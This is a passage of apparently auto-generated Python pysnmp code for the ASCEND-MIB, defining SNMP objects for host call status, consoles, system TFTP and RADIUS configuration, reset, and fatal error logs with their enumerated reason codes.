hostStatusSlotIndex.setStatus('mandatory')
host_status_item_index = mib_table_column((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 2), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
hostStatusItemIndex.setStatus('mandatory')
host_status_local_name = mib_table_column((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 3), octet_string()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
hostStatusLocalName.setStatus('mandatory')
host_status_dial_num = mib_table_column((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 4), octet_string()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
hostStatusDialNum.setStatus('mandatory')
host_status_call_type = mib_table_column((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 5), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2, 3, 4, 5, 6, 7))).clone(namedValues=named_values(('aim', 1), ('bonding', 2), ('one-channel', 3), ('two-channel', 4), ('ft1', 5), ('ft1Aim', 6), ('ft1BandO', 7)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
hostStatusCallType.setStatus('mandatory')
host_status_call_mgm = mib_table_column((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 6), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11))).clone(namedValues=named_values(('none', 1), ('manual', 2), ('static', 3), ('dynamic', 4), ('delta', 5), ('one-of-8', 6), ('one-of-40', 7), ('mode1', 8), ('mode2', 9), ('mode3', 10), ('mode0', 11)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
hostStatusCallMgm.setStatus('mandatory')
host_status_data_svc = mib_table_column((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 7), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57))).clone(namedValues=named_values(('serviceVoice', 1), ('service56KR', 2), ('service56K', 3), ('service64K', 4), ('service384KR', 5), ('service384K-H0', 6), ('service1536K', 7), ('service1536KR', 8), ('service128K', 9), ('service192K', 10), ('service256K', 11), ('service320K', 12), ('service384K', 13), ('service448K', 14), ('service512K', 15), ('service576K', 16), ('service640K', 17), ('service704K', 18), ('service768K', 19), ('service832K', 20), ('service896K', 21), ('service960K', 22), ('service1024K', 23), ('service1088K', 24), ('service1152K', 25), ('service1216K', 26), ('service1280K', 27), ('service1344K', 28), ('service1408K', 29), ('service1472K', 30), ('service1600K', 31), ('service1664K', 32), ('service1728K', 33), ('service1792K', 34), ('service1856K', 35), ('service1920K', 36), ('serviceModem', 37), ('serviceV110-24-56K', 38), ('serviceV110-48-56K', 39), ('serviceV110-96-56K', 40), ('serviceV110-192-56K', 41), ('serviceV110-384-56K', 42), ('serviceV110-24-56KR', 43), ('serviceV110-48-56KR', 44), ('serviceV110-96-56KR', 45), ('serviceV110-192-56KR', 46), ('serviceV110-384-56KR', 47), ('serviceV110-24-64K', 48), ('serviceV110-48-64K', 49), ('serviceV110-96-64K', 50), ('serviceV110-192-64K', 51), ('serviceV110-384-64K', 52), ('serviceV110-24-64KR', 53), ('serviceV110-48-64KR', 54), ('serviceV110-96-64KR', 55), ('serviceV110-192-64KR', 56), ('serviceV110-384-64KR', 57)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
hostStatusDataSvc.setStatus('mandatory')
host_status_call_state = mib_table_column((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 8), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17))).clone(namedValues=named_values(('other', 1), ('answering', 2), ('calling', 3), ('clearing', 4), ('localLoop', 5), ('handshake', 6), ('idle', 7), ('online', 8), ('loopMast', 9), ('loopSlav', 10), ('bertMast', 11), ('bertSlav', 12), ('remoteMg', 13), ('ringing', 14), ('setupAdd', 15), ('setupHnd', 16), ('setupRem', 17)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
hostStatusCallState.setStatus('mandatory')
host_status_rem_name = mib_table_column((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 9), octet_string()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
hostStatusRemName.setStatus('mandatory')
host_status_channels = mib_table_column((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 10), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
hostStatusChannels.setStatus('mandatory')
host_status_duration = mib_table_column((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 11), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
hostStatusDuration.setStatus('mandatory')
console_number = mib_scalar((1, 3, 6, 1, 4, 1, 529, 8, 1), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
consoleNumber.setStatus('mandatory')
console_table = mib_table((1, 3, 6, 1, 4, 1, 529, 8, 2))
if mibBuilder.loadTexts:
consoleTable.setStatus('mandatory')
console_entry = mib_table_row((1, 3, 6, 1, 4, 1, 529, 8, 2, 1)).setIndexNames((0, 'ASCEND-MIB', 'consoleIndex'))
if mibBuilder.loadTexts:
consoleEntry.setStatus('mandatory')
console_index = mib_table_column((1, 3, 6, 1, 4, 1, 529, 8, 2, 1, 1), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
consoleIndex.setStatus('mandatory')
console_if = mib_table_column((1, 3, 6, 1, 4, 1, 529, 8, 2, 1, 2), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
consoleIf.setStatus('mandatory')
console_type = mib_table_column((1, 3, 6, 1, 4, 1, 529, 8, 2, 1, 3), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2, 3, 4, 5, 6))).clone(namedValues=named_values(('other', 1), ('primary', 2), ('secondary', 3), ('palmtop', 4), ('inactive', 5), ('remote', 6)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
consoleType.setStatus('mandatory')
console_security = mib_table_column((1, 3, 6, 1, 4, 1, 529, 8, 2, 1, 4), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
consoleSecurity.setStatus('mandatory')
console_specific = mib_table_column((1, 3, 6, 1, 4, 1, 529, 8, 2, 1, 5), object_identifier()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
consoleSpecific.setStatus('mandatory')
sys_absolute_startup_time = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 1), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
sysAbsoluteStartupTime.setStatus('mandatory')
sys_secs_since_startup = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 2), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
sysSecsSinceStartup.setStatus('mandatory')
sys_mib_version_num = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 3), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
sysMibVersionNum.setStatus('mandatory')
sys_mib_minor_rev_num = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 4), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
sysMibMinorRevNum.setStatus('mandatory')
sys_config_tftp = mib_identifier((1, 3, 6, 1, 4, 1, 529, 9, 5))
sys_config_tftp_cmd = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 5, 1), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2, 3, 4, 5, 6, 7, 8))).clone(namedValues=named_values(('save', 1), ('restore', 2), ('saveAll', 3), ('saveMib', 4), ('saveAllMib', 5), ('loadCode', 6), ('saveIncProf', 7), ('saveExcProf', 8)))).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
sysConfigTftpCmd.setStatus('mandatory')
sys_config_tftp_status = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 5, 2), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17))).clone(namedValues=named_values(('ok', 1), ('notFound', 2), ('access', 3), ('noSpace', 4), ('badOp', 5), ('badTid', 6), ('exists', 7), ('noSuchUser', 8), ('parameter', 9), ('busy', 10), ('noResources', 11), ('timeout', 12), ('unrecoverable', 13), ('tooManyRetries', 14), ('createFile', 15), ('openFile', 16), ('inProgress', 17)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
sysConfigTftpStatus.setStatus('mandatory')
sys_config_tftp_host_addr = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 5, 3), ip_address()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
sysConfigTftpHostAddr.setStatus('mandatory')
sys_config_tftp_filename = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 5, 4), display_string()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
sysConfigTftpFilename.setStatus('mandatory')
sys_config_tftp_port = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 5, 5), integer32()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
sysConfigTftpPort.setStatus('mandatory')
sys_config_tftp_parameter = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 5, 6), display_string()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
sysConfigTftpParameter.setStatus('mandatory')
sys_config_radius = mib_identifier((1, 3, 6, 1, 4, 1, 529, 9, 6))
sys_config_radius_cmd = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 6, 1), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2, 3, 4, 5, 6))).clone(namedValues=named_values(('all', 1), ('routes', 2), ('pools', 3), ('nailed', 4), ('termsrv', 5), ('source', 6)))).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
sysConfigRadiusCmd.setStatus('mandatory')
sys_config_radius_status = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 6, 2), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2, 3, 4, 5))).clone(namedValues=named_values(('init', 1), ('processing', 2), ('timeout', 3), ('error', 4), ('complete', 5)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
sysConfigRadiusStatus.setStatus('mandatory')
sys_absolute_current_time = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 7), integer32()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
sysAbsoluteCurrentTime.setStatus('mandatory')
sys_reset = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 8), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2))).clone(namedValues=named_values(('no-op', 1), ('reset', 2)))).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
sysReset.setStatus('mandatory')
sys_load_name = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 9), display_string()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
sysLoadName.setStatus('mandatory')
sys_auth_preference = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 10), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2, 3, 4))).clone(namedValues=named_values(('no-op', 1), ('local-first', 2), ('remote-first', 3), ('remote-no', 4)))).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
sysAuthPreference.setStatus('mandatory')
sys_sprom = mib_identifier((1, 3, 6, 1, 4, 1, 529, 9, 11))
sys_sprom_serial_number = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 11, 1), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
sysSPROMSerialNumber.setStatus('mandatory')
sys_sprom_options1 = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 11, 2), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
sysSPROMOptions1.setStatus('mandatory')
sys_sprom_options2 = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 11, 3), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
sysSPROMOptions2.setStatus('mandatory')
sys_sprom_countries1 = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 11, 4), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
sysSPROMCountries1.setStatus('mandatory')
reset_stat = mib_identifier((1, 3, 6, 1, 4, 1, 529, 9, 12))
reset_stat_ether = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 12, 1), integer32()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
resetStatEther.setStatus('mandatory')
reset_stat_wan = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 12, 2), integer32()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
resetStatWAN.setStatus('mandatory')
reset_stat_all = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 12, 3), integer32()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
resetStatAll.setStatus('mandatory')
sys_last_restart_reason = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 13), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 55, 60, 61, 62, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 129, 130, 131, 135, 136, 140, 145, 146, 150, 151, 152, 153, 154, 160, 161, 165, 170, 171, 175, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 190, 191, 192, 193, 194, 195, 196, 197, 198, 200, 201, 210, 211, 220, 221, 300, 301, 302, 303, 304, 305, 306, 309, 310, 311, 312, 313, 314, 320, 321, 330, 381, 382, 383, 384, 385, 400, 550, 512, 767, 768, 800, 801, 999, 1001, 1002, 1003, 1005, 1006, 1007, 2001, 2002, 2010, 2022, 2100, 2101, 3001, 3002, 3003, 4000, 4100, 9998, 9999))).clone(namedValues=named_values(('fatalAssert', 1), ('fatalPoolsNoBuffer', 2), ('fatalProfileBad', 3), ('fatalSwitchTypeBad', 4), ('fatalLif', 5), ('fatalLcdError', 6), ('fatalIsacTimeout', 7), ('fatalSCCSpuriousInterrupt', 8), ('fatalExecInvalidSwitch', 9), ('fatalExecNoMailDesc', 10), ('fatalExecNoMailPoll', 11), ('fatalExecNoTask', 12), ('fatalExecNoTimer', 13), ('fataExecNoTimerPool', 14), ('fatalExecWaitInCtricalSection', 15), ('fatalDspDead', 16), ('fatalDspProtocolError', 17), ('fatalDspInternalError', 18), ('fatalDspLossOfSync', 19), ('fatalDspUnUsed', 20), ('fatalDDDDead', 21), ('fatalDDDProtocolError', 22), ('fatalX25Buffers', 23), ('fatalX25Init', 24), ('fatalX25Stack', 25), ('fatalZeroMemoryAlloc', 27), ('fatalNegativeMemoryAllocate', 28), ('fatalTaskLoop', 29), ('fatalMemcpyTooLarge', 30), ('fatalMemcpyNoMagic', 31), ('fatalMemcpyWrongMagic', 32), ('fatalMemcoyBadStart', 33), ('fatalIDECTimeout', 34), ('fatalExecRestricted', 35), ('fatalStackOverflow', 36), ('fatalDRAMCard', 37), ('fatalMbufPanic', 38), ('fatalNoPriority2Task', 39), ('fatalProtectionFault', 40), ('fatalClipping', 41), ('fatalReadyHangFault', 42), ('fatalExcessPostCompl', 43), ('fatalWriteProtect', 44), ('fatalPureVirtual', 45), ('fatalATMSVC', 46), ('fatalFRSVC', 47), ('fatalInterruptCode', 48), ('fatalLinkedListCorruption', 55), ('fatalBadPower', 60), ('fatalWatchdogTimeout', 61), ('fatalUnexplainedNMI', 62), ('fatalPrimarySelected', 98), ('fatalOperatorReset', 99), ('fatalSystemUp', 100), ('warningBufferInUse', 101), ('warningBufferWrongPool', 102), ('warningBufferWrongHeap', 103), ('warningBufferNotMemAlloc', 104), ('warningBufferBadMemAlloc', 105), ('warningBufferBogusPool', 106), ('warningBufferBogusHeap', 107), ('warningBufferNegativeMemalloc', 108), ('warningBufferZeroMemalloc', 109), ('warningBufferBoundary', 110), ('warningBufferTooBig', 111), ('warningBufferNull', 112), ('warningBufferSegmentCountZero', 113), ('warningBufferTrailerMagic', 114), ('warningBufferTrailerBuffer', 115), ('warningBufferTrailerLength', 116), ('warningBufferTrailerUserMagic', 117), ('warningBufferWriteAfterFree', 118), ('warningBufferNotInUse', 119), ('warningBufferMemcpyMagic', 120), ('warningBufferMemcpyMagicNext', 121), ('warningBufferNoExtraDRAM', 129), ('errprPPPAsuncBufferInUse', 130), ('warningIpcpIpLookup', 131), ('warningBadChunk', 135), ('warningUnexpectedIF', 136), ('warningNoTimers', 140), ('warningLCDAllocFailure', 145), ('warningLCDNonSense', 146), ('warningMemcpyTooLarge', 150), ('warningMemcpyNoMagic', 151), ('warningMemcpyWrongMagic', 152), ('warningMemcpyBadStart', 153), ('warningWANBufferLeak', 154), ('warningTermSrvState', 160), ('warningTermSrvSemaphore', 161), ('warningTelnetFreeDrv', 165), ('warningSTACTimeout', 170), ('warningSTACDataNotOwned', 171), ('warningExecFailure', 175), ('warningExecNoMailbox', 177), ('warningExecNoResources', 178), ('warningUnexpected', 179), ('warningChannelMapStuck', 180), ('warningChannelDisplayStuck', 181), ('warningNewCallNoDiscRequest', 182), ('warningNewCallNoDiscResp', 183), ('warningDisconnectRequestDropped', 184), ('warningSpyderBuffer', 185), ('warningSpyderDesc', 186), ('warningSpyderLoseChannel', 187), ('warningHscxSlowRelay', 188), ('warningTcpSbcontTooBig', 190), ('warningTcpSequenceGap', 191), ('warningTcpTooMuchData', 192), ('warningTcpTooMuchWrite', 193), ('warningTcpBadOptions', 194), ('warningLmodSlotDown', 195), ('warningLmodDspDown', 196), ('warningLmodDspmodemDown', 197), ('warningTcpXmitLooping', 198), ('warningOspfFatal', 200), ('warningOspfWarn', 201), ('warningBriJumperNotPresent', 210), ('warningBriJumperConfiguration', 211), ('infoCardBounced', 220), ('infoCardDown', 221), ('warningTacacsplusBase', 300), ('warningTacacsplusPointerInconsistency', 301), ('warningTacacsplusIndexInconsistency', 302), ('warningTacacsplusTcpInconsistency', 303), ('warningTacacsplusTcpOutofrangesocket', 304), ('warningTacacsplusSocketMismatch', 305), ('warningTacacsplusUnexpectedAuthState', 306), ('warningTacacsplusMax', 309), ('warningCidrWrongTree', 310), ('warningCidrNoMem', 311), ('warningCidrBusy', 312), ('warningCidrNonempty', 313), ('warningCidrDupDelete', 314), ('warningSauthWrongInfo', 320), ('warningSauthBadAddr', 321), ('warningGdbProtectionFault', 330), ('warningInFilterList', 381), ('warningNoCountInFilterList', 382), ('warningMismatchCountFilterList', 383), ('warningCdtUnprotectedAccess', 384), ('infoSystemResetOccurred', 385), ('warningBadPowerSupply', 400), ('warningEthernetNoTxBuf', 550), ('warningDspCrashMin', 512), ('warningDspCrashMax', 767), ('warningDspWrongSlot', 768), ('warningUnalignedAccess', 800), ('warningH323NoResources', 801), ('warningExecRestricted', 999), ('warningEthernetCuBusy', 1001), ('warningEthernetAckFailure', 1002), ('warningEthernetReset', 1003), ('warningEthernetCuActive', 1005), ('warningEthernetWaitScb', 1006), ('warningEthernetNoMACAddress', 1007), ('warningBaeepromChange', 2001), ('warningBaeepromImageMismatch', 2002), ('warningFlashTypeBad', 2010), ('warningMaxiopLoadFailure', 2022), ('warningPrimaryHWsetupFailed', 2100), ('warningSecondaryHWsetupFailed', 2101), ('warningIpxsapFilterMagic', 3001), ('warningIpxsapFilterCountZero', 3002), ('warningIpxsapFilterCountMismatch', 3003), ('warningModemTxChannelStuck', 4000), ('warningModemTxChannelRecovered', 4100), ('notApplicable', 9998), ('unknown', 9999)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
sysLastRestartReason.setStatus('mandatory')
sys_config_change = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 14), display_string()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
sysConfigChange.setStatus('mandatory')
sys_config_flash = mib_identifier((1, 3, 6, 1, 4, 1, 529, 9, 15))
fatal_log_table = mib_table((1, 3, 6, 1, 4, 1, 529, 9, 16))
if mibBuilder.loadTexts:
fatalLogTable.setStatus('mandatory')
fatal_log_table_entry = mib_table_row((1, 3, 6, 1, 4, 1, 529, 9, 16, 1)).setIndexNames((0, 'ASCEND-MIB', 'fatalLogIndex'))
if mibBuilder.loadTexts:
fatalLogTableEntry.setStatus('mandatory')
fatal_log_index = mib_table_column((1, 3, 6, 1, 4, 1, 529, 9, 16, 1, 1), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
fatalLogIndex.setStatus('mandatory')
fatal_log_slot_index = mib_table_column((1, 3, 6, 1, 4, 1, 529, 9, 16, 1, 2), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
fatalLogSlotIndex.setStatus('mandatory')
fatal_log_software_verion = mib_table_column((1, 3, 6, 1, 4, 1, 529, 9, 16, 1, 3), display_string()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
fatalLogSoftwareVerion.setStatus('mandatory')
fatal_log_userprofile = mib_table_column((1, 3, 6, 1, 4, 1, 529, 9, 16, 1, 4), display_string()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
fatalLogUserprofile.setStatus('mandatory')
fatal_log_load_name = mib_table_column((1, 3, 6, 1, 4, 1, 529, 9, 16, 1, 5), display_string()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
fatalLogLoadName.setStatus('mandatory')
fatal_log_location = mib_table_column((1, 3, 6, 1, 4, 1, 529, 9, 16, 1, 6), display_string()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
fatalLogLocation.setStatus('mandatory')
fatal_log_reason = mib_table_column((1, 3, 6, 1, 4, 1, 529, 9, 16, 1, 7), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 55, 60, 61, 62, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 129, 130, 131, 135, 136, 140, 145, 146, 150, 151, 152, 153, 154, 160, 161, 165, 170, 171, 175, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 190, 191, 192, 193, 194, 195, 196, 197, 198, 200, 201, 210, 211, 220, 221, 300, 301, 302, 303, 304, 305, 306, 309, 310, 311, 312, 313, 314, 320, 321, 330, 381, 382, 383, 384, 385, 400, 550, 512, 767, 768, 800, 801, 999, 1001, 1002, 1003, 1005, 1006, 1007, 2001, 2002, 2010, 2022, 2100, 2101, 3001, 3002, 3003, 4000, 4100, 9998, 9999))).clone(namedValues=named_values(('fatalAssert', 1), ('fatalPoolsNoBuffer', 2), ('fatalProfileBad', 3), ('fatalSwitchTypeBad', 4), ('fatalLif', 5), ('fatalLcdError', 6), ('fatalIsacTimeout', 7), ('fatalSCCSpuriousInterrupt', 8), ('fatalExecInvalidSwitch', 9), ('fatalExecNoMailDesc', 10), ('fatalExecNoMailPoll', 11), ('fatalExecNoTask', 12), ('fatalExecNoTimer', 13), ('fataExecNoTimerPool', 14), ('fatalExecWaitInCtricalSection', 15), ('fatalDspDead', 16), ('fatalDspProtocolError', 17), ('fatalDspInternalError', 18), ('fatalDspLossOfSync', 19), ('fatalDspUnUsed', 20), ('fatalDDDDead', 21), ('fatalDDDProtocolError', 22), ('fatalX25Buffers', 23), ('fatalX25Init', 24), ('fatalX25Stack', 25), ('fatalZeroMemoryAlloc', 27), ('fatalNegativeMemoryAllocate', 28), ('fatalTaskLoop', 29), ('fatalMemcpyTooLarge', 30), ('fatalMemcpyNoMagic', 31), ('fatalMemcpyWrongMagic', 32), ('fatalMemcoyBadStart', 33), ('fatalIDECTimeout', 34), ('fatalExecRestricted', 35), ('fatalStackOverflow', 36), ('fatalDRAMCard', 37), ('fatalMbufPanic', 38), ('fatalNoPriority2Task', 39), ('fatalProtectionFault', 40), ('fatalClipping', 41), ('fatalReadyHangFault', 42), ('fatalExcessPostCompl', 43), ('fatalWriteProtect', 44), ('fatalPureVirtual', 45), ('fatalATMSVC', 46), ('fatalFRSVC', 47), ('fatalInterruptCode', 48), ('fatalLinkedListCorruption', 55), ('fatalBadPower', 60), ('fatalWatchdogTimeout', 61), ('fatalUnexplainedNMI', 62), ('fatalPrimarySelected', 98), ('fatalOperatorReset', 99), ('fatalSystemUp', 100), ('warningBufferInUse', 101), ('warningBufferWrongPool', 102), ('warningBufferWrongHeap', 103), ('warningBufferNotMemAlloc', 104), ('warningBufferBadMemAlloc', 105), ('warningBufferBogusPool', 106), ('warningBufferBogusHeap', 107), ('warningBufferNegativeMemalloc', 108), ('warningBufferZeroMemalloc', 109), ('warningBufferBoundary', 110), ('warningBufferTooBig', 111), ('warningBufferNull', 112), ('warningBufferSegmentCountZero', 113), ('warningBufferTrailerMagic', 114), ('warningBufferTrailerBuffer', 115), ('warningBufferTrailerLength', 116), ('warningBufferTrailerUserMagic', 117), ('warningBufferWriteAfterFree', 118), ('warningBufferNotInUse', 119), ('warningBufferMemcpyMagic', 120), ('warningBufferMemcpyMagicNext', 121), ('warningBufferNoExtraDRAM', 129), ('errprPPPAsuncBufferInUse', 130), ('warningIpcpIpLookup', 131), ('warningBadChunk', 135), ('warningUnexpectedIF', 136), ('warningNoTimers', 140), ('warningLCDAllocFailure', 145), ('warningLCDNonSense', 146), ('warningMemcpyTooLarge', 150), ('warningMemcpyNoMagic', 151), ('warningMemcpyWrongMagic', 152), ('warningMemcpyBadStart', 153), ('warningWANBufferLeak', 154), ('warningTermSrvState', 160), ('warningTermSrvSemaphore', 161), ('warningTelnetFreeDrv', 165), ('warningSTACTimeout', 170), ('warningSTACDataNotOwned', 171), ('warningExecFailure', 175), ('warningExecNoMailbox', 177), ('warningExecNoResources', 178), ('warningUnexpected', 179), ('warningChannelMapStuck', 180), ('warningChannelDisplayStuck', 181), ('warningNewCallNoDiscRequest', 182), ('warningNewCallNoDiscResp', 183), ('warningDisconnectRequestDropped', 184), ('warningSpyderBuffer', 185), ('warningSpyderDesc', 186), ('warningSpyderLoseChannel', 187), ('warningHscxSlowRelay', 188), ('warningTcpSbcontTooBig', 190), ('warningTcpSequenceGap', 191), ('warningTcpTooMuchData', 192), ('warningTcpTooMuchWrite', 193), ('warningTcpBadOptions', 194), ('warningLmodSlotDown', 195), ('warningLmodDspDown', 196), ('warningLmodDspmodemDown', 197), ('warningTcpXmitLooping', 198), ('warningOspfFatal', 200), ('warningOspfWarn', 201), ('warningBriJumperNotPresent', 210), ('warningBriJumperConfiguration', 211), ('infoCardBounced', 220), ('infoCardDown', 221), ('warningTacacsplusBase', 300), ('warningTacacsplusPointerInconsistency', 301), ('warningTacacsplusIndexInconsistency', 302), ('warningTacacsplusTcpInconsistency', 303), ('warningTacacsplusTcpOutofrangesocket', 304), ('warningTacacsplusSocketMismatch', 305), ('warningTacacsplusUnexpectedAuthState', 306), ('warningTacacsplusMax', 309), ('warningCidrWrongTree', 310), ('warningCidrNoMem', 311), ('warningCidrBusy', 312), ('warningCidrNonempty', 313), ('warningCidrDupDelete', 314), ('warningSauthWrongInfo', 320), ('warningSauthBadAddr', 321), ('warningGdbProtectionFault', 330), ('warningInFilterList', 381), ('warningNoCountInFilterList', 382), ('warningMismatchCountFilterList', 383), ('warningCdtUnprotectedAccess', 384), ('infoSystemResetOccurred', 385), ('warningBadPowerSupply', 400), ('warningEthernetNoTxBuf', 550), ('warningDspCrashMin', 512), ('warningDspCrashMax', 767), ('warningDspWrongSlot', 768), ('warningUnalignedAccess', 800), ('warningH323NoResources', 801), ('warningExecRestricted', 999), ('warningEthernetCuBusy', 1001), ('warningEthernetAckFailure', 1002), ('warningEthernetReset', 1003), ('warningEthernetCuActive', 1005), ('warningEthernetWaitScb', 1006), ('warningEthernetNoMACAddress', 1007), ('warningBaeepromChange', 2001), ('warningBaeepromImageMismatch', 2002), ('warningFlashTypeBad', 2010), ('warningMaxiopLoadFailure', 2022), ('warningPrimaryHWsetupFailed', 2100), ('warningSecondaryHWsetupFailed', 2101), ('warningIpxsapFilterMagic', 3001), ('warningIpxsapFilterCountZero', 3002), ('warningIpxsapFilterCountMismatch', 3003), ('warningModemTxChannelStuck', 4000), ('warningModemTxChannelRecovered', 4100), ('notApplicable', 9998), ('unknown', 9999)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
fatalLogReason.setStatus('mandatory')
fatal_log_absolute_time = mib_table_column((1, 3, 6, 1, 4, 1, 529, 9, 16, 1, 8), integer32().subtype(subtypeSpec=value_range_constraint(1, 2147483647))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
fatalLogAbsoluteTime.setStatus('mandatory')
sys_config_flash_cmd = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 15, 1), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2))).clone(namedValues=named_values(('copyPCMCIAtoInternal', 1), ('copyInternalToPCMCIA', 2)))).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
sysConfigFlashCmd.setStatus('mandatory')
sys_config_flash_copy_status = mib_scalar((1, 3, 6, 1, 4, 1, 529, 9, 15, 2), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2, 3))).clone(namedValues=named_values(('ok', 1), ('inProgress', 2), ('failed', 3)))).setMaxAccess('readonly')
